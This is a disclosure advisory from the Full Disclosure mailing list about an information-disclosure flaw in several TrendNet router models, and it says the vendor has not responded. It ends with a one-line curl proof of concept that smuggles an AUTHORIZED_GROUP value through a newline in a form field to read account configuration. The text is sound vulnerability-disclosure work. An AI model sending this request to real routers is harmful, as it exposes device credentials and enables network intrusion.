SSD Advisory – TrendNet AUTHORIZED_GROUP Information Disclosure Full report: https://blogs.securiteam.com/index.php/archives/3627 Twitter: @SecuriTeam_SSD Weibo: SecuriTeam_SSD Vulnerability Summary The following advisory describes an information disclosure found in the following TrendNet routers: * TEW-751DR – v1.03B03 * TEW-752DRU – v1.03B01 * TEW733GR – v1.03B01 TRENDnet’s “N600 Dual Band Wireless Router, model TEW-751DR, offers proven concurrent Dual Band 300 Mbps Wireless N networking. Embedded GREENnet technology reduces power consumption by up to 50%. For your convenience this router comes pre-encrypted and features guest networks. Seamlessly stream HD video with this powerful router.” Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. Vendor response Several attempts to email TrendNet went unanswered, we have no idea what is the status of a fix or availability of a workaround. Vulnerability details When an Admin is log-in to one of the mentioned TrendNet routers – it will trigger the global variable: $AUTHORIZED_GROUP >= 1. An attacker can use this global variable to bypass security checks and use it to read arbitrary files. Proof of Concept $ curl -d "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1" "http:// [IP]/getcfg.php"
Attachment:
SSD Advisory – TrendNet AUTHORIZED_GROUP Information Disclosure.pdf
Description: Adobe PDF document
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/